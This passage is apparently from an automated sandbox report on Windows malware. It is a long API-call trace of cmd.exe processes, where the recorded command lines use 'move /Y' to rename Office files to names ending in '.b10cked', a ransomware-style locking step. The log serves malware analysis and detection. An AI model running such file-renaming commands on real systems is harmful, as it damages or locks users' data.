lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6INTL.REST.trx_dll", lpFilePart=0x0) returned 0x45 [0173.071] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6INTL.REST.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\pub6intl.rest.trx_dll")) returned 0x2020 [0173.071] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6INTL.REST.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\pub6intl.rest.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6INTL.REST.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\pub6intl.rest.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0173.071] FindClose (in: hFindFile=0x372138 | out: hFindFile=0x372138) returned 1 [0173.072] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x28e8c0 | out: _Buffer=" 1") returned 9 [0173.072] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.072] GetFileType (hFile=0x7) returned 0x2 [0173.096] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0173.096] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28e84c | out: lpMode=0x28e84c) returned 1 [0173.097] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.097] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x28e880 | out: lpConsoleScreenBufferInfo=0x28e880) returned 1 [0173.097] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0173.097] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x28e8c0 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0173.097] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, 
lpNumberOfCharsWritten=0x28e8a4, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28e8a4*=0x1a) returned 1 [0173.098] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.098] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0173.098] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.098] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0173.098] _get_osfhandle (_FileHandle=0) returned 0x3 [0173.098] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0173.098] SetConsoleInputExeNameW () returned 0x1 [0173.098] GetConsoleOutputCP () returned 0x1b5 [0173.098] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0173.098] SetThreadUILanguage (LangId=0x0) returned 0x409 [0173.099] exit (_Code=0) Process: id = "301" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16e60" os_pid = "0x134" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUBWZI~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUBWZINT.REST.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 23580 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 23581 start_va = 0x30000 end_va = 0x33fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 23582 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 23583 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 23584 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 23585 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 23586 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 23587 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 23588 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 23589 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 23698 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 23699 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 23700 start_va = 0x50000 end_va = 0x5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = 
"" Region: id = 23701 start_va = 0x190000 end_va = 0x1f6fff entry_point = 0x190000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 23702 start_va = 0x350000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 23703 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 23704 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 23705 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 23706 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 23707 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 23708 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 23709 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 23710 start_va 
= 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 23711 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 23712 start_va = 0x200000 end_va = 0x2c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000200000" filename = "" Region: id = 23713 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 23714 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 23715 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 23716 start_va = 0x70000 end_va = 0x71fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 23717 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 23718 start_va = 0x2d0000 end_va = 0x2d0fff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 23719 start_va = 0x450000 end_va = 0x550fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 23720 start_va = 0x560000 end_va = 0x115ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 23721 start_va = 0x1160000 end_va = 0x12c2fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000001160000" filename = "" Thread: id = 400 os_tid = 0x740 [0173.461] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fd4c | out: lpSystemTimeAsFileTime=0x18fd4c*(dwLowDateTime=0x9d497a20, dwHighDateTime=0x1d440a9)) [0173.461] GetCurrentProcessId () returned 0x134 [0173.461] GetCurrentThreadId () returned 0x740 [0173.461] GetTickCount () returned 0x32809 [0173.461] QueryPerformanceCounter (in: lpPerformanceCount=0x18fd44 | out: lpPerformanceCount=0x18fd44*=23025033718) returned 1 [0173.462] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0173.462] __set_app_type (_Type=0x1) [0173.462] __p__fmode () returned 0x76b331f4 [0173.462] __p__commode () returned 0x76b331fc [0173.462] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0173.462] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0173.462] GetCurrentThreadId () returned 0x740 [0173.462] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x740) returned 0x38 [0173.463] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0173.463] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0173.463] SetThreadUILanguage (LangId=0x0) returned 0x409 [0173.463] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0173.463] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18fcdc | out: phkResult=0x18fcdc*=0x0) returned 0x2 [0173.463] VirtualQuery (in: lpAddress=0x18fd13, lpBuffer=0x18fcac, dwLength=0x1c | out: lpBuffer=0x18fcac*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0173.463] VirtualQuery (in: 
lpAddress=0x90000, lpBuffer=0x18fcac, dwLength=0x1c | out: lpBuffer=0x18fcac*(BaseAddress=0x90000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0173.463] VirtualQuery (in: lpAddress=0x91000, lpBuffer=0x18fcac, dwLength=0x1c | out: lpBuffer=0x18fcac*(BaseAddress=0x91000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0173.463] VirtualQuery (in: lpAddress=0x93000, lpBuffer=0x18fcac, dwLength=0x1c | out: lpBuffer=0x18fcac*(BaseAddress=0x93000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0173.463] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x18fcac, dwLength=0x1c | out: lpBuffer=0x18fcac*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0173.463] GetConsoleOutputCP () returned 0x1b5 [0173.463] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0173.463] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0173.464] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.464] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0173.464] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.464] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0173.464] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.464] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0173.464] _get_osfhandle (_FileHandle=0) returned 0x3 [0173.464] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0173.464] _get_osfhandle (_FileHandle=0) returned 0x3 [0173.464] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0173.465] GetEnvironmentStringsW () returned 0x360218* [0173.465] FreeEnvironmentStringsW 
(penv=0x360218) returned 1 [0173.465] GetEnvironmentStringsW () returned 0x360218* [0173.465] FreeEnvironmentStringsW (penv=0x360218) returned 1 [0173.465] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18ec4c | out: phkResult=0x18ec4c*=0x40) returned 0x0 [0173.465] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18ec54, lpData=0x18ec58, lpcbData=0x18ec50*=0x1000 | out: lpType=0x18ec54*=0x0, lpData=0x18ec58*=0xa8, lpcbData=0x18ec50*=0x1000) returned 0x2 [0173.465] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18ec54, lpData=0x18ec58, lpcbData=0x18ec50*=0x1000 | out: lpType=0x18ec54*=0x4, lpData=0x18ec58*=0x1, lpcbData=0x18ec50*=0x4) returned 0x0 [0173.465] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18ec54, lpData=0x18ec58, lpcbData=0x18ec50*=0x1000 | out: lpType=0x18ec54*=0x0, lpData=0x18ec58*=0x1, lpcbData=0x18ec50*=0x1000) returned 0x2 [0173.465] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18ec54, lpData=0x18ec58, lpcbData=0x18ec50*=0x1000 | out: lpType=0x18ec54*=0x4, lpData=0x18ec58*=0x0, lpcbData=0x18ec50*=0x4) returned 0x0 [0173.466] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18ec54, lpData=0x18ec58, lpcbData=0x18ec50*=0x1000 | out: lpType=0x18ec54*=0x4, lpData=0x18ec58*=0x40, lpcbData=0x18ec50*=0x4) returned 0x0 [0173.466] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18ec54, lpData=0x18ec58, lpcbData=0x18ec50*=0x1000 | out: lpType=0x18ec54*=0x4, lpData=0x18ec58*=0x40, lpcbData=0x18ec50*=0x4) returned 0x0 [0173.466] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18ec54, lpData=0x18ec58, lpcbData=0x18ec50*=0x1000 | out: lpType=0x18ec54*=0x0, lpData=0x18ec58*=0x40, 
lpcbData=0x18ec50*=0x1000) returned 0x2 [0173.466] RegCloseKey (hKey=0x40) returned 0x0 [0173.466] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18ec4c | out: phkResult=0x18ec4c*=0x40) returned 0x0 [0173.466] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18ec54, lpData=0x18ec58, lpcbData=0x18ec50*=0x1000 | out: lpType=0x18ec54*=0x0, lpData=0x18ec58*=0x40, lpcbData=0x18ec50*=0x1000) returned 0x2 [0173.466] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18ec54, lpData=0x18ec58, lpcbData=0x18ec50*=0x1000 | out: lpType=0x18ec54*=0x4, lpData=0x18ec58*=0x1, lpcbData=0x18ec50*=0x4) returned 0x0 [0173.466] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18ec54, lpData=0x18ec58, lpcbData=0x18ec50*=0x1000 | out: lpType=0x18ec54*=0x0, lpData=0x18ec58*=0x1, lpcbData=0x18ec50*=0x1000) returned 0x2 [0173.466] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18ec54, lpData=0x18ec58, lpcbData=0x18ec50*=0x1000 | out: lpType=0x18ec54*=0x4, lpData=0x18ec58*=0x0, lpcbData=0x18ec50*=0x4) returned 0x0 [0173.466] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18ec54, lpData=0x18ec58, lpcbData=0x18ec50*=0x1000 | out: lpType=0x18ec54*=0x4, lpData=0x18ec58*=0x9, lpcbData=0x18ec50*=0x4) returned 0x0 [0173.466] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18ec54, lpData=0x18ec58, lpcbData=0x18ec50*=0x1000 | out: lpType=0x18ec54*=0x4, lpData=0x18ec58*=0x9, lpcbData=0x18ec50*=0x4) returned 0x0 [0173.466] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18ec54, lpData=0x18ec58, lpcbData=0x18ec50*=0x1000 | out: lpType=0x18ec54*=0x0, lpData=0x18ec58*=0x9, lpcbData=0x18ec50*=0x1000) returned 0x2 [0173.466] RegCloseKey (hKey=0x40) 
returned 0x0 [0173.466] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886389 [0173.466] srand (_Seed=0x5b886389) [0173.466] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUBWZI~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUBWZINT.REST.trx_dll.b10cked\"" [0173.466] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUBWZI~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUBWZINT.REST.trx_dll.b10cked\"" [0173.467] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0173.467] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x361978, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0173.467] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0173.467] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0173.467] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0173.467] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0173.467] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0173.467] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0173.467] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0173.467] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0173.467] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0173.467] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0173.467] 
_wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0173.467] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0173.468] GetEnvironmentStringsW () returned 0x362368* [0173.468] FreeEnvironmentStringsW (penv=0x362368) returned 1 [0173.468] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0173.468] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0173.468] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0173.468] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0173.468] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0173.468] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0173.468] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0173.468] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0173.468] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0173.468] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0173.468] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x18fa18 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0173.468] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x18fa18, lpFilePart=0x18fa14 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x18fa14*="Desktop") returned 0x18 [0173.468] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0173.468] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x18f794 | out: lpFindFileData=0x18f794) returned 0x3609f8 [0173.468] FindClose (in: hFindFile=0x3609f8 | out: hFindFile=0x3609f8) returned 1 [0173.469] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x18f794 | out: lpFindFileData=0x18f794) returned 0x3609f8 [0173.469] FindClose (in: 
hFindFile=0x3609f8 | out: hFindFile=0x3609f8) returned 1 [0173.469] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x18f794 | out: lpFindFileData=0x18f794) returned 0x3609f8 [0173.469] FindClose (in: hFindFile=0x3609f8 | out: hFindFile=0x3609f8) returned 1 [0173.469] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0173.469] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0173.469] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0173.469] GetEnvironmentStringsW () returned 0x360218* [0173.469] FreeEnvironmentStringsW (penv=0x360218) returned 1 [0173.469] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0173.470] GetConsoleOutputCP () returned 0x1b5 [0173.470] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0173.470] GetUserDefaultLCID () returned 0x409 [0173.470] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0173.470] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18fb58, cchData=128 | out: lpLCData="0") returned 2 [0173.470] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x18fb58, cchData=128 | out: lpLCData="0") returned 2 [0173.470] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x18fb58, cchData=128 | out: lpLCData="1") returned 2 [0173.470] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0173.470] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0173.471] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0173.471] GetLocaleInfoW (in: Locale=0x409, 
LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0173.471] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0173.471] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0173.471] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0173.471] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0173.471] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0173.471] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0173.471] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0173.472] GetConsoleTitleW (in: lpConsoleTitle=0x350938, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0173.472] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0173.472] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0173.472] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0173.472] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0173.473] _wcsicmp (_String1="move", _String2=")") returned 68 [0173.473] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0173.473] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0173.473] _wcsicmp (_String1="IF", _String2="move") returned -4 [0173.473] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0173.473] _wcsicmp (_String1="REM", _String2="move") returned 5 [0173.473] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0173.476] GetConsoleTitleW (in: lpConsoleTitle=0x18f850, nSize=0x104 | out: 
